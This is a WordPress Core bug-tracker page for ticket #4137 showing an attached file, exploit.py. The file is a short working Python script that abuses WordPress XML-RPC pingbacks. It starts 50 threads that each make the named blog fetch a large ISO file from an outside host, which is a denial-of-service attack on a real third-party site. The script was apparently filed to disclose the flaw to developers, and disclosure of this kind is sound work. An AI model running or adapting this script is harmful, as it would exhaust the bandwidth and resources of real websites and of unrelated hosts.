Make WordPress Core

Ticket #4137: exploit.py

File exploit.py, 751 bytes (added by foobarwp12, 18 years ago)

Exploit

Line 
1#!/bin/env python
2# vim:ft=python:fileencoding=utf-8
3#
4from xmlrpclib import ServerProxy
5from urllib import urlopen
6from random import randint
7from threading import Thread
8
9# Define target
10targetURL = "http://blog.wordpress-deutschland.org/2007/04/03/wordpress-213-und-2010-de-edition.html"
11hugeFile  = "http://www.tld.com/path-to-a-big-iso-file-from-a-major-linux-distribution.iso#i%d"
12
13# Fetch Pingback-URL
14pingbackURL =  urlopen(targetURL).headers["X-Pingback"]
15print "Target URL: %s\nPingback:   %s" % (targetURL, pingbackURL)
16
17# Attack
18def attack():
19  server = ServerProxy(pingbackURL)
20  try: server.pingback.ping(hugeFile % randint(10, 1000), targetURL)
21  except: pass
22for i in range(50):
23  Thread(target=attack).start()
24print "-- attacking --"